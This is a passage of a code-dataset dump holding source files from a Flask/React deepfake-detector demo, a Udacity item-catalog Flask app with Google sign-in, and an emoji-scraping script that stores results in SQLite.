className=\"App\">\n {this.props.analysingVideo ? ((\n <div>\n <br></br>\n <p>Processing Video ... Current Probability of being real: {this.props.currentProbability}%</p>\n <ProgressBar animated now={this.props.analysisProgress} label={`${(Math.round((this.props.analysisProgress / 35) * 100))}%`} max={35}/>\n <br></br>\n </div>\n )) \n : (null)}\n </div>\n );}\n}\n\nexport default AnalysisComponent;\n" }, { "alpha_fraction": 0.4497487545013428, "alphanum_fraction": 0.6783919334411621, "avg_line_length": 14.920000076293945, "blob_id": "ec389bf5cec454ecd94fd2a3e095231264dd1954", "content_id": "5e9a60460a00287e3709d5db1d4ebf1fd89e3e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 398, "license_type": "no_license", "max_line_length": 23, "num_lines": 25, "path": "/requirements.txt", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "click==7.1.2\ncmake==3.16.3\ncycler==0.10.0\ndlib==19.19.0\nFlask==1.1.2\nimutils==0.5.3\nitsdangerous==1.1.0\nJinja2==2.11.2\nkiwisolver==1.2.0\nMarkupSafe==1.1.1\nmatplotlib==3.2.1\nnumpy==1.18.1\nopencv-python==4.2.0.32\npafy==0.5.5\npandas==1.0.0\nPillow==7.0.0\npyparsing==2.4.7\npython-dateutil==2.8.1\npytz==2019.3\nsix==1.14.0\ntorch==1.4.0\ntorchvision==0.5.0\ntqdm==4.42.1\nWerkzeug==1.0.1\nyoutube-dl==2020.5.3\n" }, { "alpha_fraction": 0.5528544783592224, "alphanum_fraction": 0.5741844177246094, "avg_line_length": 33.10160446166992, "blob_id": "6732143db004bc07629ae7daa20698cf142e2f23", "content_id": "7a12e366a0cec8b10f093fb02a37dfe56c95de8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6376, "license_type": "no_license", "max_line_length": 122, "num_lines": 187, "path": "/app.py", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": 
"import flask\nimport dlib\nimport cv2\nimport pafy\nimport pandas as pd\nimport os\nfrom PIL import Image\nfrom imutils import face_utils, resize\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.models as models\nimport torchvision.transforms as transforms\n\n# 2D CNN encoder using pretrained VGG16 (input is sequence of images)\nclass VGGCNN(nn.Module):\n def __init__(self, fc_hidden1=512, fc_hidden2=512, drop_p=0.3, CNN_embed_dim=25088):\n \"\"\"Load the pretrained vgg 16 and replace top fc layer.\"\"\"\n super(VGGCNN, self).__init__()\n\n self.fc_hidden1, self.fc_hidden2 = fc_hidden1, fc_hidden2\n self.drop_p = drop_p\n\n vgg = models.vgg16(pretrained=True)\n # delete the last fc layer.\n modules = list(vgg.children())[:-1]\n self.vgg = nn.Sequential(*modules)\n \n def forward(self, x_3d):\n cnn_embed_seq = []\n for t in range(x_3d.size(1)):\n # VGG CNN\n with torch.no_grad():\n # VGG feature extraction\n x = self.vgg(x_3d[:, t, :, :, :])\n # flatten output of conv\n x = x.view(x.size(0), -1)\n cnn_embed_seq.append(x)\n\n # swap time and sample dim such that (sample dim, time dim, CNN latent dim)\n cnn_embed_seq = torch.stack(cnn_embed_seq, dim=0).transpose_(0, 1)\n # cnn_embed_seq: shape=(batch, time_step, input_size)\n\n return cnn_embed_seq\n\n\nclass LSTM(nn.Module):\n def __init__(self, CNN_embed_dim=25088, h_RNN_layers=3, h_RNN=256, h_FC_dim=128, drop_p=0.5, num_classes=2):\n super(LSTM, self).__init__()\n\n self.RNN_input_size = CNN_embed_dim\n # RNN hidden layers\n self.h_RNN_layers = h_RNN_layers\n # RNN hidden nodes\n self.h_RNN = h_RNN\n self.h_FC_dim = h_FC_dim\n self.drop_p = drop_p\n self.num_classes = num_classes\n\n self.LSTM = nn.LSTM(\n input_size=self.RNN_input_size,\n hidden_size=self.h_RNN, \n num_layers=h_RNN_layers, \n batch_first=True, # input & output will has batch size as 1s dimension. e.g. 
(batch, time_step, input_size)\n        )\n\n        self.fc1 = nn.Linear(self.h_RNN, 128)\n        self.bn1 = nn.BatchNorm1d(self.h_FC_dim, momentum=0.01)\n        self.fc2 = nn.Linear(self.h_FC_dim, 64)\n        self.bn2 = nn.BatchNorm1d(64, momentum=0.01)\n        self.fc3 = nn.Linear(64, self.num_classes)\n\n    def forward(self, x_RNN):\n        \n        self.LSTM.flatten_parameters()\n        RNN_out, (h_n, h_c) = self.LSTM(x_RNN, None) \n        \n        x = self.bn1(self.fc1(RNN_out[:, -1, :])) # Use value at last time step in sequence\n        x = F.relu(x)\n        x = F.dropout(x, p=self.drop_p, training=self.training)\n        x = self.bn2(self.fc2(x))\n        x = F.relu(x)\n        x = F.dropout(x, p=self.drop_p, training=self.training)\n        x = self.fc3(x)\n        x = torch.sigmoid(x)\n\n\n        return x\n\n# load detection model parameters\ncnn = VGGCNN()\ncnn.cuda()\ncnn.load_state_dict(torch.load('./model/full_data_cnnmodel_for_lstm_2.pth'), strict=False)\ncnn.eval()\nlstm = LSTM()\nlstm.load_state_dict(torch.load('./model/extended_lstm_architecture_cnn_lstm_epoch_3.pth'))\nlstm.cuda()\nlstm.eval()\n\n# Setup mouth extractor\np = r\"..\\mouth-extraction-preprocessing\\shape_predictor_68_face_landmarks.dat\"\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(p)\n\n\napp = flask.Flask(__name__, template_folder='templates')\n\ndef analyse_video(filename):\n    # Setup reading video\n    vidcap = cv2.VideoCapture(filename)\n    success = True\n    frame_count = 1\n    voter_tally = 0\n    X = []\n    print(\"Evaluating: {}\".format(filename))\n    while success and frame_count < 720:\n        success,image = vidcap.read()\n        if not success:\n            break\n        gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n        faces = detector(gray, 0)\n        largest_face_size = 0\n\n        if len(faces) == 0:\n            continue\n\n        for (i, face) in enumerate(faces):\n            # Make the prediction and transform it to numpy array\n            #face = face.rect\n            shape = predictor(gray, face)\n            shape = face_utils.shape_to_np(shape)\n            size = face.width() * face.height()\n            if largest_face_size < size:\n                largest_face_size = size\n\n        # Mouth region uses these indices for dlib\n        (i, j) = (48, 68)\n        # clone the original image so we can draw on it, then\n        # display the name of the face part on the image\n        clone = image.copy()\n\n        # loop over the subset of facial landmarks, drawing the\n        # specific face part\n        for (x, y) in shape[i:j]:\n            cv2.circle(clone, (x, y), 1, (0, 0, 255), -1)\n        (x, y, w, h) = cv2.boundingRect(np.array([shape[i:j]]))\n        roi = image[y:y + h, x:x + w]\n        roi = cv2.resize(roi, (224,224))\n        X.append(transforms.ToTensor()(roi))\n\n        if frame_count % 20 == 0:\n            X = torch.stack(X, dim=0)\n            X = X.unsqueeze(0)\n            outputs = lstm(cnn(X.cuda()))\n            _, predicted = torch.max(outputs.data, 1)\n            voter_tally += predicted.sum()\n            X = []\n            print(\"current voter tally: {}, current frame sequences processed: {}\".format(voter_tally, frame_count / 20))\n            current_probability = (voter_tally.item() / (frame_count / 20)) * 100\n            yield str(round(current_probability, 2))\n        frame_count += 1\n    print(frame_count)\n    print(\"voter tally: {}\".format(voter_tally))\n    if voter_tally < (frame_count / 20) / 2:\n        print(\"fake: video: {}\".format(filename))\n        yield \"Fake\"\n    else:\n        #real_vids += 1\n        print(\"real: video: {}\".format(filename))\n        yield \"Real\"\n\[email protected]('/', methods=['GET'])\ndef main():\n    if flask.request.method == 'GET':\n        return(flask.render_template('main.html'))\n\[email protected]('/detect', methods=['POST'])\ndef detect():\n    url = flask.request.json['url']\n    filename = pafy.new(url).getbest().url\n    return 
flask.Response(flask.stream_with_context(analyse_video(filename)), mimetype='text/event-stream')\n\n\nif __name__ == '__main__':\n app.run()" }, { "alpha_fraction": 0.800561785697937, "alphanum_fraction": 0.800561785697937, "avg_line_length": 88, "blob_id": "a29c7467df2c40458adf27e05d6419fe1cf5d485", "content_id": "fe142faef46dfbe1e38e8aba9d599335cc41235b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 356, "license_type": "no_license", "max_line_length": 124, "num_lines": 4, "path": "/README.md", "repo_name": "bdixon300/deepfake-detector-mvp-deployment", "src_encoding": "UTF-8", "text": "# deepfake-detector-deployment-backend\nMVP demo for Deepfake detection model. Run frontend with \"npm start\" from the react app directory. \nRun backend using \"flask run\" in the top directory. The react app will take any YouTube video input, no other URL will work.\nThis demo was designed for collecting user feedback so it could be improved for production.\n" } ]
5
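A detail worth isolating from the `app.py` above is how the detector reports progress: `analyse_video` is a generator, and Flask streams each yielded string to the client through `stream_with_context` instead of waiting for the final verdict. Here is a minimal, model-free sketch of that pattern (the `time.sleep` call is a stand-in for scoring one 20-frame batch; route name and mimetype are simplified for illustration):

```python
import time
import flask

app = flask.Flask(__name__)

def analyse():
    # stand-in for the per-batch scoring loop in analyse_video()
    for step in range(1, 4):
        time.sleep(0.1)
        yield "progress %d/3\n" % step
    yield "Real\n"  # the final verdict is the last chunk streamed

@app.route("/detect", methods=["POST"])
def detect():
    # stream_with_context keeps the request context alive while the
    # generator is still producing chunks
    return flask.Response(flask.stream_with_context(analyse()),
                          mimetype="text/plain")

if __name__ == "__main__":
    app.run()
```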
bradleyGamiMarques/ItemCatalog
https://github.com/bradleyGamiMarques/ItemCatalog
86ea2fcc6b4a4d3c513e84a0995c15c89b31c002
51858555bec5f17ddebf5de1217aa0a917f8f0c2
38889d9803467381482b9ad6c2906bc920a1f19e
refs/heads/master
2020-03-21T08:05:36.320135
2018-06-22T17:13:32
2018-06-22T17:13:32
138,319,712
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7570533156394958, "alphanum_fraction": 0.7742946743965149, "avg_line_length": 30.875, "blob_id": "0d9663e5fc0119113b56f5addc15df991905b65a", "content_id": "f6b5d2c07b681078efd053dd53b801a6ec644f33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1276, "license_type": "no_license", "max_line_length": 149, "num_lines": 40, "path": "/README.md", "repo_name": "bradleyGamiMarques/ItemCatalog", "src_encoding": "UTF-8", "text": "# ItemCatalog\nUdacity Item Catalog project\n\n\n# Description\n\nThe item catalog project has students build an application from the ground up. This is my solution to the project.\n\n## Getting Started:\n\nTo get started with this project you will need to have a couple of files.\n\n* A Unix style terminal. Windows users, I prefer Git Bash. Mac users your regular terminal will be fine.\n* The tools Vagrant and VirtualBox\n* The virtual machine files: https://s3.amazonaws.com/video.udacity-data.com/topher/2018/April/5acfbfa3_fsnd-virtual-machine/fsnd-virtual-machine.zip\n\n\n## Starting up the virtual machine\n\n1. Install the version of [VirtualBox](https://www.virtualbox.org/wiki/Download_Old_Builds_5_1) for your operating system.\n _Windows users may have to disable Hyper-V_\n\n2. Install [Vagrant](https://www.vagrantup.com)\n\n3. cd into the directory with the virtual machine files then cd into the /vagrant directory\n\n4. Use the command vagrant up to start the virtual machine.\n\n5. Once that is complete use the command vagrant ssh to log into your virtual machine.\n\n\n## Using this code\n\n1. cd into the catalog directory.\n\n2. Run the application.py file from the command line. python application.py\n\n3. Navigate to localhost:8000 in a browser.\n\n4. 
Application will be running here.\n\n" }, { "alpha_fraction": 0.6454988718032837, "alphanum_fraction": 0.6493343114852905, "avg_line_length": 36.09552764892578, "blob_id": "65bcba182a9e30ba97fcd2ba435d2c7579504c44", "content_id": "29c34854599bb3f4a3349fa33edbaf7289ca3bdc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18251, "license_type": "no_license", "max_line_length": 137, "num_lines": 492, "path": "/catalog/application.py", "repo_name": "bradleyGamiMarques/ItemCatalog", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, redirect, jsonify, url_for, flash\nfrom sqlalchemy import create_engine, asc\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Category, CategoryItem, User\nfrom flask import session as login_session\nimport random\nimport string\n\n# IMPORTS FOR THIS STEP\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport json\nfrom flask import make_response\nimport requests\n\napp = Flask(__name__)\n# Read our client id that was downloaded from our Google API\nCLIENT_ID = json.loads(\n open('client_secrets.json', 'r').read())['web']['client_id']\n\n# Connect to the database\nengine = create_engine('sqlite:///catalog.db',\n connect_args={'check_same_thread': False})\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\[email protected]('/login')\ndef showLogin():\n \"\"\"This function renders the login.html page.\"\"\"\n # Create a state variable to prevent cross site scripting attacks.\n state = ''.join(random.choice(string.ascii_uppercase + string.digits)\n for x in xrange(32))\n login_session['state'] = state\n # return \"The current session state is %s\" % login_session['state']\n return render_template('login.html', STATE=state)\n\n# Begin JSON API Endpoint Functions.\n\n\[email protected]('/category/<int:category_id>/items/JSON')\ndef categoryItems(category_id):\n \"\"\"This function displays all of the items in a category in JSON format.\n\n Keyword arguments:\n category_id(int) An numeric id for identifying a category in the database.\n \"\"\"\n items = session.query(CategoryItem).filter_by(\n category_id=category_id).all()\n return jsonify(category_items=[i.serialize for i in items])\n\n\[email protected]('/category/JSON')\ndef categoriesJSON():\n \"\"\"This function displays all of the categories in JSON format.\"\"\"\n categories = session.query(Category).all()\n return jsonify(categories=[c.serialize for c in categories])\n\n\[email protected]('/catalog/JSON')\ndef show_catalog():\n \"\"\"This function shows all of the categories and items in the database\n in JSON format.\"\"\"\n categories = session.query(Category).all()\n items = session.query(CategoryItem).all()\n return jsonify(\n categories=[\n c.serialize for c in categories], category_items=[\n i.serialize for i in items])\n\n\n# End JSON API Endpoint Functions.\n\[email protected]('/')\[email protected]('/catalog')\ndef main_page():\n \"\"\"Renders the home page of the application.\"\"\"\n # Query the database for all of its data.\n categories = session.query(Category).all()\n items = session.query(CategoryItem).all()\n # Check to see if the user is logged in.\n # If the user is not logged in they cannot access some app features.\n if 'username' not in login_session:\n return render_template(\n 'publiccategories.html',\n categories=categories,\n items=items)\n else:\n 
return render_template(\n            'categories.html',\n            categories=categories,\n            items=items)\n\n# Create a new category\n\n\[email protected]('/category/new', methods=['GET', 'POST'])\ndef newCategory():\n    \"\"\"Render the html page for creating a new category in the catalog.\"\"\"\n    # Check to see if the user is allowed to create a new category.\n    if 'username' not in login_session:\n        return redirect('/login')\n    # POST request allows us to modify our database.\n    if request.method == 'POST':\n        newCategory = Category(category_name=request.form['name'],\n                               user_id=login_session['user_id'])\n        session.add(newCategory)\n        # Create the new category here.\n        session.commit()\n        flash('New Category Successfully Created')\n        return redirect(url_for('main_page'))\n    else:\n        # GET Request for the html that contains the form for\n        # creating a new category.\n        return render_template('newCategory.html')\n\n\n# Create a new item in a category\n\[email protected]('/category/new/item', methods=['GET', 'POST'])\ndef newItem():\n    \"\"\"This function renders the page for creating a new item in a category.\"\"\"\n\n    # Check to see if the user is logged in.\n    if 'username' not in login_session:\n        return redirect('/login')\n    # POST request allows us to modify our database.\n    if request.method == 'POST':\n        # Gather the information from the form.\n        newItem = CategoryItem(item_name=request.form['name'],\n                               description=request.form['description'],\n                               category_id=request.form['categories'],\n                               user_id=login_session['user_id'])\n        session.add(newItem)\n        # Add the new item to the database.\n        session.commit()\n        flash('New Item Successfully Created')\n        return redirect(url_for('main_page'))\n    else:\n        # Query for all the categories users can select\n        categories = session.query(Category).all()\n        # Return the html that contains the form for creating a new item.\n        # Pass in the variable categories that the form needs to complete\n        # its job.\n        return render_template('newItem.html', categories=categories)\n\n\n# Get all the items in a category\n\[email protected]('/catalog/<string:category>/items')\ndef get_items(category):\n    \"\"\"Get the items in a category and render the correct template based\n    on the end-user's login status.\n\n    Keyword Arguments:\n    category(str): A string representation of the category name.\n    \"\"\"\n    # Query for all the categories users can select\n    categories = session.query(Category).all()\n\n    # Query for the category the user selected either by clicking or by url.\n    selected_category = session.query(\n        Category).filter_by(category_name=category).one()\n\n    # Query for all the items that are associated with a category.\n    selected_category_items = session.query(\n        CategoryItem).filter_by(category_id=selected_category.id).all()\n    # Render the template if the user is not logged in.\n    if 'username' not in login_session:\n        return render_template('publicitems.html', categories=categories,\n                               selected_category=selected_category,\n                               selected_category_items=selected_category_items)\n    else:\n        # Render the template if the user is logged in.\n        return render_template('privateitems.html', categories=categories,\n                               selected_category=selected_category,\n                               selected_category_items=selected_category_items)\n\n\n# Get the description of an item in a category.\n\[email protected]('/catalog/<string:category>/<string:item>/')\ndef get_items_description(category, item):\n    \"\"\"Render the template for getting an item's description that belongs to\n    a category. 
If the user is logged in and is authorized they can edit\n    descriptions or delete the item entirely.\n\n    Keyword Arguments:\n    category(str): A string representation of the category name.\n    item(str): A string representation of the item name.\n    \"\"\"\n    selected_item = session.query(CategoryItem).filter_by(item_name=item).one()\n    authorized_user = session.query(User).filter_by(\n        id=selected_item.user_id).one()\n    # Check to see if the user is logged in.\n    if 'username' in login_session:\n        username = login_session['username']\n    else:\n        username = None\n    # Render the private template. The user who is logged in and\n    # is authorized to edit and delete is provided links to do so\n    # in this template.\n    if 'username' in login_session and username == authorized_user.name:\n        return render_template(\n            'privateItemDescription.html',\n            category=category,\n            item=item,\n            selected_item=selected_item)\n    else:\n        # Render the public template. Users who are not logged in cannot edit\n        # item descriptions or delete items.\n        return render_template(\n            'publicItemDescription.html',\n            category=category,\n            item=item,\n            selected_item=selected_item)\n\n\n# Edit an item in a catalog.\n\[email protected](\n    '/catalog/<string:category>/<string:item>/edit',\n    methods=[\n        'GET',\n        'POST'])\ndef editCategoryItem(category, item):\n    \"\"\"This function allows the user to edit an item in a category.\n\n    Keyword Arguments:\n    category(str): A string representation of the category name.\n    item(str): A string representation of the item name.\n    \"\"\"\n    if 'username' not in login_session:\n        return redirect('/login')\n    elif 'username' in login_session:\n        username = login_session['username']\n    else:\n        username = None\n    categories = session.query(Category).all()\n    # Item to be edited.\n    edited_item = session.query(CategoryItem).filter_by(item_name=item).one()\n    # Query for the user who is authorized to perform edits.\n    authorized_user = session.query(User).filter_by(\n        id=edited_item.user_id).one()\n    if username != authorized_user.name:\n        # Tell the user they are not allowed to edit items in this catalog.\n        return \"\"\"<script>function myFunction()\n        {alert('You are not authorized to edit items in this catalog.\n        Please create your own catalog in order to edit items.');}</script>\n        <body onload='myFunction()''>\"\"\"\n    if request.method == 'POST':\n        # Take the information from the form and update the record in the\n        # database.\n        if request.form['name']:\n            edited_item.item_name = request.form['name']\n        if request.form['description']:\n            edited_item.description = request.form['description']\n        if request.form['category']:\n            edited_item.category_id = request.form['category']\n        session.add(edited_item)\n        # Commit the changes to the database.\n        session.commit()\n        flash('Category Item Successfully Edited')\n        return redirect(url_for('main_page'))\n    else:\n        # Render the template that contains the form for editing an item.\n        # Pass in the variables that the template needs to complete its job.\n        return render_template(\n            'editItem.html',\n            categories=categories,\n            item=item)\n\n\[email protected](\n    '/catalog/<string:category>/<string:item>/delete',\n    methods=[\n        'GET',\n        'POST'])\ndef deleteCategoryItem(category, item):\n    \"\"\"This function allows the user to delete an item in a category.\n\n    Keyword Arguments:\n    category(str): A string representation of the category name.\n    item(str): A string representation of the item name.\n    \"\"\"\n    if 'username' not in login_session:\n        return redirect('/login')\n    elif 'username' in login_session:\n        
username = login_session['username']\n else:\n username = None\n # Query for the item that is to be deleted.\n itemToDelete = session.query(CategoryItem).filter_by(item_name=item).one()\n # Query for the user who is authorized to perform deletions.\n authorized_user = session.query(User).filter_by(\n id=itemToDelete.user_id).one()\n if username != authorized_user.name:\n return \"\"\"<script>function myFunction()\n {alert('You are not authorized to delete items in this catalog.\n Please create your own catalog in order to delete items.');}</script>\n <body onload='myFunction()''>\"\"\"\n if request.method == 'POST':\n session.delete(itemToDelete)\n session.commit()\n flash('Category Item Successfully Deleted')\n return redirect(url_for('main_page'))\n else:\n return render_template('deleteItem.html', item=item)\n\n\[email protected]('/gconnect', methods=['POST'])\ndef gconnect():\n \"\"\"Taken from Udacity, this function allows us to provide sign in with\n google.\"\"\"\n\n # Validate state token\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n # Obtain authorization code\n code = request.data\n\n try:\n # Upgrade the authorization code into a credentials object\n oauth_flow = flow_from_clientsecrets('client_secrets.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps('Failed to upgrade the authorization code.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid.\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n # If there was an error in the access token info, abort.\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user.\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\"Token's user ID doesn't match given user ID.\"), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for this app.\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\"Token's client ID does not match app's.\"), 401)\n print \"Token's client ID does not match app's.\"\n response.headers['Content-Type'] = 'application/json'\n return response\n\n stored_access_token = login_session.get('access_token')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_access_token is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps('Current user is already connected.'), 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later use.\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n\n data = answer.json()\n\n 
login_session['username'] = data['name']\n    login_session['picture'] = data['picture']\n    login_session['email'] = data['email']\n\n    # see if user exists, if it doesn't make a new one\n    user_id = getUserID(data[\"email\"])\n    if not user_id:\n        user_id = createUser(login_session)\n    login_session['user_id'] = user_id\n\n    output = ''\n    output += '<h1>Welcome, '\n    output += login_session['username']\n    output += '!</h1>'\n    output += '<img src=\"'\n    output += login_session['picture']\n    # Over line limit, but should pass since it is Udacity code.\n    output += \"\"\" style = \"width: 300px; height: 300px;border-radius: 150px;-webkit-border-radius: 150px;-moz-border-radius: 150px;\"> \"\"\"\n    flash(\"you are now logged in as %s\" % login_session['username'])\n    print \"done!\"\n    return output\n\n\[email protected]('/gdisconnect')\ndef gdisconnect():\n    \"\"\"Udacity code for disconnecting a user from google sign-in.\"\"\"\n    access_token = login_session.get('access_token')\n    if access_token is None:\n        print 'Access Token is None'\n        response = make_response(json.dumps(\n            'Current user not connected.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    print 'In gdisconnect access token is %s', access_token\n    print 'User name is: '\n    print login_session['username']\n    # Over the line character limit but should pass because this is Udacity\n    # code.\n    url = 'https://accounts.google.com/o/oauth2/revoke?token=%s' % login_session['access_token']\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[0]\n    print 'result is '\n    print result\n    if result['status'] == '200':\n        del login_session['access_token']\n        del login_session['gplus_id']\n        del login_session['username']\n        del login_session['email']\n        del login_session['picture']\n        # Over the line character limit but should pass because this is Udacity\n        # code.\n        response = make_response(json.dumps('Successfully disconnected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    else:\n        response = make_response(json.dumps(\n            'Failed to revoke token for given user.'), 400)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n\n# Helper functions.\n\n\ndef getUserID(email):\n    \"\"\"Returns a user id.\n    Keyword Arguments:\n    email(str): a string representation of an email address.\n    \"\"\"\n    try:\n        user = session.query(User).filter_by(email=email).one()\n        return user.id\n    except BaseException:\n        return None\n\n\ndef getUserInfo(user_id):\n    \"\"\"Return a user object.\n\n    Keyword Arguments:\n    user_id(int): An integer representation of a user_id.\n    \"\"\"\n    user = session.query(User).filter_by(id=user_id).one()\n    return user\n\n\ndef createUser(login_session):\n    \"\"\"Creates a new user and returns their user_id.\n\n    Keyword Arguments:\n    login_session(obj): A login session object.\n    \"\"\"\n    # Create a new user from the login_session object.\n    newUser = User(\n        name=login_session['username'],\n        email=login_session['email'],\n        picture=login_session['picture'])\n    # Add the user to the database.\n    session.add(newUser)\n    # Commit the changes.\n    session.commit()\n    user = session.query(User).filter_by(email=login_session['email']).one()\n    return user.id\n\n\nif __name__ == '__main__':\n    app.debug = True\n    app.secret_key = 'super_secret_key'\n    app.run(host='0.0.0.0', port=8000)\n" }, { "alpha_fraction": 0.479082316160202, "alphanum_fraction": 0.4851551949977875, "avg_line_length": 31.2391300201416, "blob_id": "c5f0e8698328e76cbedae910af0e003af7d1db07", "content_id": 
"49492e18cc608159f5941fa85fe73e0920a40a07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1482, "license_type": "no_license", "max_line_length": 115, "num_lines": 46, "path": "/catalog/templates/categories.html", "repo_name": "bradleyGamiMarques/ItemCatalog", "src_encoding": "UTF-8", "text": "<!DOCTYPE html>\n<html lang=\"en\">\n\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\n <link rel=\"stylesheet\" href=\"/static/styles.css\">\n <link href=\"https://fonts.googleapis.com/css?family=Roboto\" rel=\"stylesheet\">\n <title>Catalog App</title>\n</head>\n\n<body>\n <div class=\"header\">\n <h1 class=\"title\">Catalog App</h1>\n <button id=\"logoutbutton\" class=\"loginButton\">Logout</button>\n <script src=\"static/logoutscript.js\"></script>\n </div>\n <div class=\"bodyContentContainer\">\n <div class=\"leftColumn\">\n <span><a href=\"{{url_for('newCategory')}}\">Add Category</a></span>\n <h2>Categories</h2>\n <div>\n <ul>\n {% for i in categories %}\n <li><a href=\"{{url_for('get_items', category = i.category_name)}}\">{{i.category_name}}</a></li>\n {% endfor %}\n </ul>\n </div>\n </div>\n <div class=\"verticalLine\"></div>\n <div class=\"rightColumn\">\n <span><a href=\"{{url_for('newItem')}}\">Add Item</a></span>\n <h2>Latest Items</h2>\n <div>\n <ul>\n {% for i in items %}\n <li>{{i.item_name}}</li>\n {% endfor %}\n </ul>\n </div>\n </div>\n </div>\n</body>\n\n</html>" } ]
3
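The gconnect handler in the catalog app above runs three separate checks against Google's tokeninfo endpoint before trusting a token: the endpoint must not report an error, the token's user_id must match the credential's subject, and the token must have been issued to this app's CLIENT_ID. A minimal sketch of just that validation step, factored into one function; the endpoint URL and the three checks come from the handler itself, while the function name and the use of requests (instead of httplib2) are illustrative assumptions:

```python
import requests

# Tokeninfo endpoint queried by the gconnect handler above.
TOKENINFO_URL = "https://www.googleapis.com/oauth2/v1/tokeninfo"


def validate_google_token(access_token, expected_client_id, expected_user_id):
    """Hypothetical helper: returns (ok, reason) after the same three
    checks gconnect performs inline."""
    result = requests.get(TOKENINFO_URL,
                          params={"access_token": access_token}).json()
    if result.get("error") is not None:
        return False, result["error"]              # token rejected by Google
    if result.get("user_id") != expected_user_id:
        return False, "user ID mismatch"           # token issued for another user
    if result.get("issued_to") != expected_client_id:
        return False, "client ID mismatch"         # token issued for another app
    return True, "ok"
```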
nucle0tides/emoji-scraper
https://github.com/nucle0tides/emoji-scraper
0e7c49462b57e95e541fd5fc5c3214c8918fb129
dd6462f11d84a77b1b982073933f40ac71704bd1
8816acfe4712b57dbcf835a14082d0d9e06d7639
refs/heads/master
2021-01-11T10:38:39.306107
2017-02-25T03:27:29
2017-02-25T03:27:29
72,954,970
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5256167054176331, "alphanum_fraction": 0.5303605198860168, "avg_line_length": 32.4603157043457, "blob_id": "a4aa06c911ad387ee922719d96664cc2f67a39f8", "content_id": "e002d6bf2a5993a0ff6382c4e4cffbc2093d17ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2108, "license_type": "no_license", "max_line_length": 106, "num_lines": 63, "path": "/emoji-scraper.py", "repo_name": "nucle0tides/emoji-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport urllib.request\nimport os\nimport sqlite3\n\n\nclass EmojiScraper(object):\n def __init__(self, url):\n self.url = url \n self.soup = None\n\n def get_soup(self): \n page = requests.get(self.url)\n self.soup = bs(page.text, \"html.parser\")\n\n def get_emoji_table(self): \n return self.soup.find(\"table\").find_all(\"tr\")\n\n def get_emoji_url(self, cell):\n return cell.find(\"img\")[\"src\"]\n\n def get_emoji_attr(self, cell):\n return cell.getText()\n\n def download_images(self, emoji_table):\n conn = sqlite3.connect('database.db')\n print(conn)\n c = conn.cursor()\n for row in emoji_table[1::]:\n cells = row.find_all(\"td\")\n try:\n name = self.get_emoji_attr(cells[16])\n categories = self.get_emoji_attr(cells[18]).split(' | ')\n #print(categories)\n if ':' in name:\n name = name.replace(':', '')\n url = self.get_emoji_url(cells[5])\n c.execute(\"INSERT INTO emojis (name, url) VALUES (? , ?)\", (name, url))\n for cat in categories:\n #print(cat)\n c.execute(\"INSERT INTO categories (emoji_name, category) VALUES (? , ?)\", (name, cat))\n #print(url)\n urllib.request.urlretrieve(url, \"emojis/\" + name + \".png\")\n except Exception as e:\n # I know this is /bad/ but\n # likely an index out of range exception\n # meaning there is no image or it's a row we don't need\n # print error to be certain\n print(e)\n pass\n conn.commit() \n\n\nif __name__ == \"__main__\": \n Scraper = EmojiScraper(\"http://unicode.org/emoji/charts/full-emoji-list.html\")\n Scraper.get_soup() \n 